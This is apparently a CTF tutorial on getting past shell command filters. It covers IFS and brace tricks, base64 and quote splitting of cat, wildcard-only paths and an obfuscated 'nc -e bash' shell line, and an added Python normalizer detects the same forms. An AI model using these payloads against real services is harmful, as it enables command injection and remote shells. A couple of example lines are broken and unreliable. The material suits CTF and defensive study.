Preface:
In CTF challenges we often run into filters that block certain Linux commands or characters. This post summarizes some specific ways to bypass them.
First, bypassing the space filter:
{cat,flag.txt}
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
kg=$'\x20flag.txt'&&cat$kg   (in $'...' ANSI-C quoting, \x20 is a space; storing it in a variable cleverly bypasses the filter)
Second, bypassing sensitive-character filters:
Assume cat is filtered.
1. Bypass using variables:
a=c;b=at;$a$b
2. Bypass using base64 encoding:
`echo 'Y2F0Cg==' | base64 -d` test.txt   (Y2F0Cg== is the base64 encoding of "cat", so the command substitution becomes cat)
3. Bypass by splitting the command name with quotes, backslashes, or empty expansions:
c'a't test.txt
c\at test.txt
ca$@t test.txt
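Applied to the two filters above, the following Python is an added example (not from the original post): it shows that a substring blocklist for a space or for cat lets every form listed above through, and that a small normalizer which undoes the IFS, brace, redirection, quote, backslash, empty-parameter and variable-assignment tricks brings them back to cat flag.txt so the same check catches them. The sample commands are constructed from the page; the normalizer is a detection heuristic, not a full shell parser.

```python
import re

# Constructed samples of the bypass forms listed on this page (not captured traffic).
SPACE_BYPASSES = ["{cat,flag.txt}", "cat${IFS}flag.txt", "cat$IFS$9flag.txt",
                  "cat<flag.txt", "cat<>flag.txt", "kg=$'\\x20flag.txt'&&cat$kg"]
CAT_BYPASSES = ["a=c;b=at;$a$b test.txt", "c'a't test.txt",
                "c\\at test.txt", "ca$@t test.txt"]

def slips_past_blocklist(cmd: str, banned: str) -> bool:
    """The substring blocklist the page defeats: True when cmd is let through."""
    return banned not in cmd

def normalize(cmd: str) -> str:
    """Fold the page's obfuscations back into what the shell actually runs.
    Heuristic for detection/logging only: the robust mitigation is to never
    build a shell string from user input (use argv arrays or an allowlist)."""
    s = cmd
    # $'\x20' ANSI-C quoting: decode the escapes so the hidden space reappears
    s = re.sub(r"\$'((?:\\.|[^'\\])*)'",
               lambda m: m.group(1).encode().decode("unicode_escape"), s)
    s = re.sub(r"\$\{IFS\}|\$IFS", " ", s)        # ${IFS} / $IFS are a space
    s = re.sub(r"\$[0-9@*]", "", s)               # $9, $@ expand to nothing
    s = re.sub(r"[<>]+", " ", s)                  # redirection ends the word
    s = re.sub(r"(?<!\$)\{([^{}]*)\}",            # {cat,flag.txt} -> cat flag.txt
               lambda m: " ".join(m.group(1).split(",")), s)
    s = re.sub(r"\\(.)", r"\1", s)                # c\at -> cat
    s = s.replace("'", "").replace('"', "")       # c'a't -> cat
    # resolve simple assignments so a=c;b=at;$a$b becomes cat
    env, out = {}, []
    for part in re.split(r";|&&|\|\|?", s):
        m = re.fullmatch(r"\s*([A-Za-z_]\w*)=(.*)", part)
        if m:
            env[m.group(1)] = m.group(2)
            continue
        for name, val in env.items():
            part = part.replace("${%s}" % name, val).replace("$" + name, val)
        out.append(part.strip())
    return " ; ".join(p for p in out if p)

def caught_after_normalize(cmd: str, banned: str) -> bool:
    """The same substring blocklist, applied to the normalized form."""
    return banned in normalize(cmd)

if __name__ == "__main__":
    for cmd, banned in [(c, " ") for c in SPACE_BYPASSES] + [(c, "cat") for c in CAT_BYPASSES]:
        print(f"{cmd!r:32} raw check passes={slips_past_blocklist(cmd, banned)!s:5} "
              f"normalized={normalize(cmd)!r}")
```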
Third, bypassing with wildcards:
? in Linux stands for any single character:
/???/[l-n]s   stands in for ls
/???/c?t test.txt   stands in for cat test.txt
* in Linux stands for any number of any characters:
ls *.php   lists all php files in the current directory
Matching without alphanumeric characters:
If the regex filters out all alphanumeric characters and we want to execute a script,
say a script named chakdiD in the /etc directory, we can use:
. /???/???????[@-[]
[@-[] means the range from the @ character to the [ character, which covers the uppercase letters in between. This achieves matching without any alphanumeric characters and bypasses the regex.
Matching table:
Character | Explanation
* | Matches any number of any characters
? | Matches any single character
[list] | Matches any single character in the specified range (list); the list may also be a set of individual characters
[^list] | Matches any single character outside the specified range or set
[!list] | Same as [^list]
{str1,str2,...} | Matches str1 or str2 or more; may be a set
A few examples:
/???/[:lower:]s   (matches /bin/ls)
/?s?/???/[n]c 2130706433 8888 -e /???/b??h   (/?s?/???/ resolves to /usr/bin/; 2130706433 is 127.0.0.1 written as a decimal integer)
{ls / ru / tmp} n
Character map reference: https://www.secpulse.com/archives/96374.html
Reference on wildcard usage by another researcher: https://www.freebuf.com/articles/web/186298.html